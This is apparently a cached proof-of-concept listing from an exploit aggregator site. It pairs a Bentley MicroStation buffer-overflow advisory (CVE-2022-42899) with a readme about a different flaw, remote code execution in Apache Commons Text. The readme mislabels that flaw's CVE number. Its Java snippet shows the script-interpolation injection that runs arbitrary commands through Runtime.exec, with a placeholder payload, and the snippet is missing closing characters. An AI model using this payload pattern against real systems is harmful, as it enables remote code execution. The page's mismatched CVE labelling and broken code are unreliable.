CVE-2022-42899 PoC — Bentley Systems MicroStation和Bentley View 缓冲区错误漏洞

Source

https://github.com/iamsanjay/CVE-2022-42899

Associated Vulnerability

Title:Bentley Systems MicroStation和Bentley View 缓冲区错误漏洞 (CVE-2022-42899)
Description:Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.

Readme

# CVE-2022-42899
Apache Common Text starting from version 1.5 to 1.9 has Remote code execution vulnerability [CVE-2022-42899](https://www.cve.org/CVERecord?id=CVE-2022-42889). 

```java
final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('<payload to execute RCE>"); // Here you will pass payload which you want to execute such as 'mkdir /tmp/cve-2022-42899'
```

File Snapshot


 [4.0K]  /data/pocs/a5b7170d20f5be641ccb29e45a684e6734a92ecc
├── [ 991]  pom.xml
├── [ 468]  README.md
├── [4.0K]  src
│   ├── [4.0K]  main
│   │   └── [4.0K]  java
│   │       └── [4.0K]  org
│   │           └── [4.0K]  evbb
│   │               └── [ 346]  App.java
│   └── [4.0K]  test
│       └── [4.0K]  java
│           └── [4.0K]  org
│               └── [4.0K]  evbb
│                   └── [ 636]  AppTest.java
└── [4.0K]  target
    └── [4.0K]  classes
        └── [4.0K]  org
            └── [4.0K]  evbb
                └── [ 755]  App.class

13 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!